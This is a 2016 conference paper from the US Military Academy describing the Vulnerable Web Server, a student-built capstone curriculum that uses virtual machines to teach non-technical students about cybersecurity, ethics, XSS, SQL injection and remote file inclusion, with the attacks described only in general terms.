See discussions, stats, and author profiles for this publication at: [Link]

net/publication/308007012

A Capstone Design Project for Teaching Cybersecurity to Non-technical Users

Conference Paper · September 2016

DOI: 10.1145/2978192.2978216

CITATIONS READS
4 3,121

8 authors, including:

Tanya Estes James Finocchiaro

United States Military Academy West Point United States Military Academy West Point
15 PUBLICATIONS   60 CITATIONS    4 PUBLICATIONS   6 CITATIONS   

SEE PROFILE SEE PROFILE

Jean R. S. Blair Edward Sobiesk

United States Military Academy West Point United States Military Academy West Point
75 PUBLICATIONS   1,304 CITATIONS    31 PUBLICATIONS   252 CITATIONS   

SEE PROFILE SEE PROFILE

Some of the authors of this publication are also working on these related projects:

Digital image halftoning View project

All content following this page was uploaded by Edward Sobiesk on 10 August 2018.

The user has requested enhancement of the downloaded file.

 A Capstone Design Project for
Teaching Cybersecurity to Non-technical Users
Tanya Estes, James Finocchiaro, Jean Blair, Johnathan Robison, Justin Dalme,
Michael Emana, Luke Jenkins, and Edward Sobiesk
United States Military Academy
West Point, New York 10996 USA
[Link]@[Link]

ABSTRACT and college students. The student-built Vulnerable Web Server

application is a system that packages instructional materials and
This paper presents a multi-year undergraduate computing pre-built virtual machines, created using Oracle VirtualBox, into
capstone project that holistically contributes to the development of interactive cybersecurity lessons. The lessons cover the following
cybersecurity knowledge and skills in non-computing high school topics: introduction to cyber, law/ethics, Linux, cross-site scripting,
and college students. We describe the student-built Vulnerable SQL injection, and remote file inclusion. Defensive techniques are
Web Server application, which is a system that packages covered throughout most lessons, and the three attack lessons also
instructional materials and pre-built virtual machines to provide include appropriate reconnaissance concepts. The lessons allow
lessons on cybersecurity to non-technical students. The Vulnerable non-technical students to quickly and safely experience a technical
Web Server learning materials have been piloted at several high but multi-disciplinary introduction to computer security that
schools and are now integrated into multiple security lessons in an captures their imagination. The Vulnerable Web Server materials
intermediate, general education information technology course at have been piloted at several high schools and are now integrated
the United States Military Academy. Our paper interweaves a into multiple security lessons in an intermediate, general education
description of the Vulnerable Web Server materials with the senior information technology course at the United States Military
capstone design process that allowed it to be built by undergraduate Academy.
information technology and computer science students, resulting in
a valuable capstone learning experience. Throughout the paper, a In 2001, Maconachy et al [17] published a seminal model for
call is made for greater emphasis on educating the non-technical information assurance (see Figure 1). In their paper, they describe
user. People as “the heart and soul of secure systems” and they state that
People “require awareness, literacy, training and education in
Categories and Subject Descriptors sound security practices in order for systems to be secured” [17].
K.6.m [Miscellaneous]: Despite this emphasis and need, properly training and educating
Security people appears to us to be one of the weakest aspects of modern
K.3.2 [Computer and Information Science Education]: society, and this weakness is especially prevalent among the
Information systems education, Computer science education, younger generation, for whom the use of information technology is
Computer literacy now almost ubiquitous.
K.4.2 [Social Issues]:
Abuse and crime involving computers

General Terms
Security, Management

Keywords
Cybersecurity education; cybersecurity general education; multi-
discipline cybersecurity education

1. INTRODUCTION
This paper presents a multi-year undergraduate computing
capstone project that holistically contributes to the development of
cybersecurity knowledge and skills in non-computing high school

This paper is authored by an employee(s) of the United States Government and is in

the public domain. Non-exclusive copying or redistribution is allowed, provided that Figure 1. Maconachy et al’s seminal model for information
the article citation is given and the authors and agency are clearly identified as its assurance [17].
source.
SIGITE'16, September 28-October 01, 2016, Boston, MA, USA Based on this motivation, the driving force of this project is to help
ACM 978-1-4503-4452-4/16/09 non-technical students gain interest and knowledge in computers
DOI: [Link]
and computer security by providing a unique resource and
experience. Vulnerable Web Server combines free software and
curriculum designed to be used by educators to teach the basics of

142
cybersecurity. We intend that this software will ultimately motivate and pedagogy for a culminating computing project and span topics
students to obtain degrees and jobs in cybersecurity – jobs that are that include technical skills, team work, and communication.
desperately required to meet the security needs of our Nation in the Several frameworks and documents also now exist providing
private sector, government, and military. We think any motivated competencies and goals for the cybersecurity work force across the
high school or college teacher can use the Vulnerable Web Server domains of the military, government, and private sector [23, 27,
software and curriculum with an existing computer lab classroom 28]. These frameworks are mostly focused on the cybersecurity
to teach and inspire students about basic cybersecurity concepts. professional, and not on the non-technical worker, student, or
A second important aspect of this work is to demonstrate an professional.
example of a computing capstone project that contributes to society Finally, the Damn Vulnerable Web Application (DVWA) [10] is
and to the profession while also focusing on the emerging topic of intermediate-to-advanced level software that teaches cybersecurity
cybersecurity. Development of the Vulnerable Web Server through the use of a dedicated computer or virtual machine (VM)
application took place over the past two years. The consecutive that provides a PHP/SQL application. A VM is able to effectively
student development teams consisted of senior-level information replicate a physical computer with some added benefits,
technology and computer science majors who were advised by particularly the ability to take a snapshot of the virtual machine.
faculty members from multiple computing and non-technical DVWA does not provide instructions for the setup of the VM.
disciplines. Instead, educators or students must utilize outside sources for a
2. RELATED WORK tutorial. Although the use of a virtual machine is optional for
Previous literature related to various aspects of the Vulnerable Web installing DVWA, we would not advocate installing DVWA on an
Server project is mixed and diverse. existing hardware operating system. Also, those not familiar with
VMs may find them more confusing than helpful. DVWA assumes
The most successful relevant initiatives involve extracurricular the user has a fairly strong knowledge of programming and web
cybersecurity competitions. For K-12, the CyberPatriot program technologies. DVWA does not provide a walkthrough or lesson
[8] now includes thousands of high school and middle school plan for their product, nor do they address ethical instruction.
teams, and the National Collegiate Cyber Defense Competition
[20] and National Cyber League [21] are providing similarly 3. CAPSTONE PROJECT BACKGROUND
positive impact at the college level. Programs such as these are One of the unique aspects of the Vulnerable Web Server package
extraordinarily important and deserve our strongest support. is that it was iteratively designed, built, and fielded by
However, these programs go beyond the non-technical user undergraduate information technology and computer science
(although they may allow the non-technical user to become a majors for their two-semester senior capstone design project. To
technical user). Our Vulnerable Web Server project does not provide some additional context on this, we will briefly present
compete against these programs, but rather supports and some background on this capstone experience, during which the
complements them by inspiring non-technical users to seek out and Vulnerable Web Server materials were constructed.
participate in competitive cyber environments. A two-semester team capstone project is the culminating
Several excellent papers and reports address needs for experience of our information technology and computer science
cybersecurity and computing education at the K-12 and college majors. These projects are completed during senior year by teams
levels. These works address various aspects of the topic such as of generally 3-6 students. Significant effort is made to have teams
what should be included in a college-level general education course consist of students from different disciplines, and all projects
devoted solely to cybersecurity [5, 19], how to integrate “cyber involve multi-disciplinary considerations. Each project has at least
throughout an institution’s entire curriculum including within the one faculty advisor, and students are required to seek out advisors
required general education program, cyber-related electives, cyber from different disciplines as needed. The projects often have
threads, cyber minors, cyber-related majors, and cyber enrichment external, real-world customers, and all projects require tangible
opportunities” [26], and what are some of the needs and solutions deliverables. Any software construction that is part of the project is
to cybersecurity (and computing) instruction at various levels of conducted using the agile development methodology, and
education [9, 12, 13, 16]. particular care is given to address both the technical and non-
Key articles and guidelines exist (and are continuing to be technical requirements of a project.
developed) that address the addition and integration of Some of the projects, including the Vulnerable Web Server,
cybersecurity to computing curricula, such as into the disciplines of continue for multiple years. This creates the added challenges and
computer science, information technology, and information opportunities of ensuring all artifacts are properly documented and
systems [1-4, 25]. In general, these works present cybersecurity preserved; any preliminary fielding results and insights are
best practices as well as knowledge, skills, and abilities that an consolidated for the next iteration; and that some sort of hand-off
undergraduate computing program should enable. occurs between the incoming and outgoing project teams. All
More narrowly, articles, initiatives, and guidelines now exist for an multi-year projects extend and improve on the project, they do not
undergraduate program(s) that specifically focuses on simply repeat the project.
cybersecurity [7, 18, 19, 22, 24]. This emerging field of study is The Vulnerable Web Server capstone project was particularly
formally developing curriculum guidelines under the purview of challenging from a requirements analysis perspective because there
the Association for Computing Machinery and the Institute of were so many different aspects to consider. As example, our
Electrical and Electronics Engineers, and accrediting bodies such students needed to consider a user to be both the non-technical high
as ABET are giving serious consideration to the development of school or college students who would take the lessons as well as
cybersecurity accreditation program criteria. the non-technical high school or college teacher who would teach
More generally, many fine works describe computing capstone them. Besides researching and implementing the virtual
projects [6, 11, 14, 15, 29, 30]. These papers cover best practices technologies, our students also had to become knowledgeable on
pedagogy as well as cybersecurity. Finally, they needed to ensure

143
that they gave perspective students the proper ethical, legal, and fashion. Overall, this lesson provides a global context for the entire
technical backgrounds before they got to the formal cybersecurity program.
lessons.
[Link] Ethics/ Linux Introduction
4. VULNERABLE WEB SERVER (VWS) This lesson includes a PowerPoint slide presentation that explains
4.1 VWS Overview what a hacker is (black hat, white hat, and gray hat) as well as why
The software and curriculum of VWS is available as a free organizations may use a white hat hacker to find weaknesses in a
download from on our website, [Link] computing system in order to shore it up against possible
Perspective instructors are able to download the network setup exploitation by black hat hackers. Great care is taken to discuss the
guide, the required virtual machines (VMs), and the VWS legal and ethical consequences of hacking a system without written
curriculum. Instructors start by setting up the network. The consent and of taking on unauthorized privileges. The 1st, 2nd and
network setup guide provides step-by-step instructions with screen 3rd order effects of actions are treated as well. Students additionally
shots on how to create a wireless network in the classroom, learn the best ways to protect their personal information when
configure each of the physical machines, and establish the virtual operating on the Internet.
machines, which include 17 client machines (Kali Linux 2.0) as Armed with a legal and ethical foundation relative to hacking,
well as the vulnerable web server itself (Ubuntu Desktop). VWS is students then move into a block about the basics of Linux,
composed of two phases, Building a Knowledge Base and Creating introducing them to the operating system preferred by many
Understanding through Practical Exercises, both of which we will cybersecurity professionals. Students are shown both Kali and
cover in more depth below. A diagram of the phases and respective Ubuntu home screens (Figure 3) and learn about the terminal and
lessons is shown in the VWS interface pictured in Figure 2. The how to execute simple Linux commands. Time is also spent
selection of lessons for the VWS was inspired by the NICE covering how a command-line interface compares to what is
framework [23]. happening in a Graphical User Interface environment (Figure 4).
These basic Linux skills will allow students to comfortably perform
the exercises in Phase II.

Figure 2. The Vulnerable Web Server lesson interface.

As seen in Figure 2, the VWS materials are divided into multiple
lesson topics, each of which is discussed in greater detail below. Figure 3. VWS attacker and defender interfaces.

4.1.1. Phase I: Building a Knowledge Base

The intent of Building a Knowledge Base is to better educate
students on the cyber domain itself as well as provide them with (1)
the basic skills that will allow them to complete the VWS practical
exercises and (2) the legal / ethical foundation needed to safely
study attack techniques.

[Link]. Cyber Introduction

The Cyber Introduction lesson defines cyberspace and the
operations that take place in it as well as providing an overview of
the VWS content and the specific attacks covered in the materials.
These include SQL injection, Cross-Site Scripting, and Remote File
Inclusion. The Cyber Introduction lesson also covers how cyber
operations affect all aspects of our lives, including personal
security, organizational security, and military security. This
lesson’s materials are presented in a 55 minute block of instruction Figure 4. Graphical User Interface and Linux Terminals side-
that may include the use of multimedia tools, such as YouTube by-side.
videos, that help explain basic concepts in a fun and engaging

144
4.1.2. Phase II: Creating Understanding through conducted, the capstone project teams gained real-world insights on
Practical Exercises various challenges involved in having a conceptual idea meet the
reality of a classroom (see Figure 6 for pictures of this experience).
Creating Understanding through Practical Exercises is designed to
The insights resulted in numerous VWS improvements and truly
allow students to go through hands-on tutorials of three categories
gave our students the opportunity to identify and account for user
of exploits: Cross-Site Scripting, SQL Injection, and Remote File
needs as well as to integrate IT-based solutions into a user
Inclusion. Each of these lessons include an introduction and
environment.
information about the attack followed by a guided practical exercise
that allows students to conduct reconnaissance to determine if a
system is vulnerable to the attack, and then to conduct the exploit
in a safe, air-gapped network environment.
[Link]. Cross-Site Scripting
The Cross-Site Scripting (XSS) lesson presents to students the first
of three exploit categories. They learn how to: set up basic HTML
and PHP form pages; explain what an XSS is and how hackers use
it; and generate a basic XSS attack. Students also learn some
simple techniques to defend against XSS attacks. The attack
lessons emphasize the practice of reconnaissance prior to any
attack, and how hackers seek to determine the level of protection
and vulnerabilities on a site (see Figure 5).

Figure 6. Piloting the Vulnerable Web Server at high schools.

4.3 VWS Limitations
Although the VWS materials provide some great opportunities for
students, there are currently still some limitations.
The current implementation of VWS is focused more towards
educating students on offensive, as opposed to defensive,
techniques. The goals of VWS are: (1) to capture the student’s
imagination, (2) to inspire further study, and (3) to teach
cybersecurity awareness and fundamentals. Based on these goals,
as VWS evolved, design choices were made that supported ease of
Figure 5. VWS explaining Cross-Site Scripting. implementation involving attack demonstrations instead of solely
[Link]. SQL Injection defensive actions. We felt that demonstrating attacks is essential to
capturing imagination and inspiring action. Current lessons include
Students next learn about SQL Injection. This lesson begins with some defensive actions in the intro lesson and at the end of each
a high level introduction to databases and data-driven applications attack lesson. Future lessons in VWS will include more defensive-
as well as the language SQL. Four examples of how SQL injections focused actions.
have been used in the past are discussed to demonstrate the real-
world dangers of this exploit. The lesson activity that accompanies Concern has sometimes been expressed that teaching high school
this instruction has students conduct an SQL injection attack students about hacking and specific computer exploits is risky. We
showing the need for database security measures. had individuals tell us that high school students did not have the
maturity to treat such dangerous information and skills with the
[Link]. Remote File Inclusion proper respect. We disagree with these statements. We feel it is
This lesson begins with an explanation of Remote File Inclusion essential that younger students be exposed to the needed ethical
(RFI). Reconnaissance is again reinforced in this lesson by foundation in the cyber domain as early as possible and in
explaining how hackers find a site that is vulnerable to an RFI conjunction with learning some of the captivating attack
attack. The lesson emphasizes the dangers posed by remotely techniques. The cyber ethics lesson also covers some of the laws
controlled executable files. Students learn how PHP vulnerabilities regarding hacking so that students understand the potential
allow an attacker to gather victim information. This lesson also consequences of their actions. VWS does teach some basic
gives a good overview of Linux and LAMP services. As with all concepts and tools that could be used maliciously, however these
of the lessons in VWS, students are shown techniques to defend are all drawn from information that is already available on the
against the given attack. Internet. Students will not be technical experts leaving this course.
VWS compiles the information into one source so that educators
4.2 VWS Fielding can easily learn and then teach their students some basics of
Towards the end of each two-semester development cycle, the cybersecurity. We believe it is paramount for students to know and
VWS materials were piloted at several high schools and one understand cybersecurity risks and vulnerabilities, whether they go
college. At the college, it is now the center piece in several security on to become cybersecurity experts or just general users in the
lessons in an intermediate, general education information cyber domain.
technology course. Over the two years that these pilots were

145
The final challenge with the current design of VWS is that students [3] Association for Computing Machinery and IEEE Computer
may have difficulty fielding these materials on their own. In Society. 2013. Computer Science Curricula 2013
preliminary versions of VWS, students had a vulnerable server Curriculum Guidelines for Undergraduate Degree Programs
installed on their computer which they could practice on. In the in Computer Science.
current VWS version, students do not have the vulnerable server [Link]
installed on their computer. This is both a feature and a flaw. We [4] Association for Computing Machinery and IEEE Computer
do not advocate encouraging students to try this on their own Society. 2008. Information Technology 2008 Curriculum
without instructor (and ethical) supervision. Students learning Guidelines for Undergraduate Degree Programs in
outside of the classroom is beyond the scope of this project. Much Information Technology.
outside the classroom material exists on the topic and is widely [Link]
available on YouTube and other video sites. The VWS walkthrough
manual provides links to outside sources which can instruct [5] Brown, C. et al. 2012. “Anatomy, Dissection, and Mechanics
students, but exposure to this possibility is at the instructor’s of an Introductory Cyber-Security Course’s Curriculum at
discretion. the United States Naval Academy.” Proceedings of the ACM
Conference on Innovation and Technology in Computer
5. FUTURE WORK Science Education.
Future updates to the VWS curriculum may include an introduction
[6] Chard, S. and Lloyd, B. 2014. “The Evolution of Information
to scripting in python, introduction to networking, introduction to
Technology Capstone Projects into Research Projects.”
social engineering, a separate lesson on cyber laws, specific lessons
Proceedings of the ACM Special Interest Group for
targeting defense, and a methodology for dynamically updating
Information Technology Education Conference.
lesson materials based on evolving threats. We would like to field
VWS to more classrooms in order to obtain further feedback to [7] Cyber Education Project. 2016.
understand what high school teachers need, and how students learn [Link]
with the VWS materials. Ultimately, this was not a project focused [8] CyberPatriot – The National Youth Cyber Education
solely on pedagogy, but a project on packaging cybersecurity Program. 2016. [Link]
materials for secondary education and college general education in
the United States. [9] Dutta, S., and Mathur, R. 2012. “Cybersecurity-An Integral
Part of STEM.” Proceedings of the IEEE Conference on
6. CONCLUSION Integrated STEM Education Conference.
Vulnerable Web Server provides packaged materials on computer [10] DVWA. Accessed 2016. [Link]
security which can be taught by high school and college educators
who have little experience with computers, networks, or [11] Fedoruk A., Gong, M. and McCarthy, M. 2014. “Student
cybersecurity. The curriculum includes several lessons with hands- Initiated Capstone Projects.” Proceedings of the ACM
on labs teaching some basics of cybersecurity. All VWS content is Special Interest Group for Information Technology
free of charge, and it builds on other open-source software. Schools Education Conference.
must provide their own computer and network hardware. VWS [12] Google. 2015. “Searching for Computer Science: Access and
allows schools to provide cybersecurity education and allows Barriers in U.S. K-12 Education.”
students to gain cybersecurity experience, hopefully generating [Link]
further study, enthusiasm, and awareness. We believe the computer-science_report.pdf.
experience gained will encourage more students to study [13] Google. 2014. “Women Who Choose Computer Science --
cybersecurity in the future and bring more technology professionals What Really Matters.”
into the workforce to make our country’s national infrastructure [Link]
more secure. /us/edu/pdf/[Link].
In addition to this work describing the contributions and [14] Hislop, G. et al. 2012. “Panel: Capstone Experiences for
capabilities of VWS, it also demonstrates an example of a senior Information Technology.” Proceedings of the ACM Special
capstone design experience that combines many of the best Interest Group for Information Technology Education
practices of previous capstone pedagogy to produce meaningful Conference.
artifacts in the emerging cybersecurity domain. As we discussed in
the introduction, the education of People must be a central aspect [15] Jonas, M. 2014. “Capstone Experience – Achieving Success
of any security system. This project allowed our students to see with an Undergraduate Research Group in Speech.”
how much of a challenge accomplishing that education can be. Proceedings of the ACM Special Interest Group for
Information Technology Education Conference.
[16] Klaper, D. and Hovy. E. 2014. “A Taxonomy and a
The views expressed in this paper are those of the authors and do Knowledge Portal for Cybersecurity.” Proceedings of the
not reflect the official policy or position of the United States 15th Annual International Conference on Digital
Military Academy, the Department of the Army, the Department of Government Research.
Defense, or the United States Government.
[17] Maconachy, W. et al. 2001. “A Model for Information
Assurance: An Integrated Approach.” Proceedings of the
7. REFERENCES IEEE Workshop on Information Assurance and Security.
[Link]
[18] McGettrick, A. et al. 2014. Panel: “Toward Curricular
[1] ACM Inroads. March 2014. Volume 5, No. 1.
Guidelines for Cybersecurity.” Proceedings of the ACM
[2] ACM Inroads. June 2015. Volume 6, No. 2.

146
 Special Interest Group for Computer Science Education [25] Rowe, D., Lunt, B., and Ekstrom, J. 2011. “The Role of
Conference. Cyber-Security in Information Technology Education.”
[19] Military Academy CYBER Education Working Group. 2015. Proceedings of the ACM Special Interest Group for
Draft Cyber Body of Knowledge. Information Technology Education Conference.
[Link] [26] Sobiesk, E. et al. 2015. “Cyber Education: a Multilayer,
%20Draft%20Body%20of%[Link]. Multidiscipline Approach.” Proceedings of the ACM Special
[20] National Collegiate Cyber Defense Competition. 2016. Interest Group for Information Technology Education
[Link] Conference.

[21] National Cyber League. 2016. [27] United States Department of Energy. Accessed 25 May 2015.
[Link] Essential Body of Knowledge – A Competency and
Functional Framework for Cyber Security Workforce
[22] National CyberWatch Center. 2016. Development. [Link]
[Link] body-knowledge-ebk.
[23] National Initiative for Cybersecurity Education (NICE) [28] United States Department of Labor. Accessed 25 May 2015.
Careers and Studies. Accessed 25 May 2015. DRAFT Cybersecurity Competency Model.
National Cybersecurity Workforce Framework Version 2.0. [Link]
[Link] -models/[Link].
workforce-framework-version-20.
[29] Zhang, C. and Wang, J. A. 2011. “Performance on
[24] National Security Agency and the Department of Homeland Successful IT Capstone Projects: A Case Study.”
Security National Centers of Academic Excellence in Proceedings of the ACM Special Interest Group for
Information Assurance (IA)/Cyber Defense (CD). Accessed Information Technology Education Conference.
2015.
[Link] [30] Zheng, G., Zhang, C., and Li, L. 2015. “Practicing and
ml. Evaluating Soft Skills in IT Capstone Projects.” Proceedings
of the ACM Special Interest Group for Information
Technology Education Conference.

147

View publication stats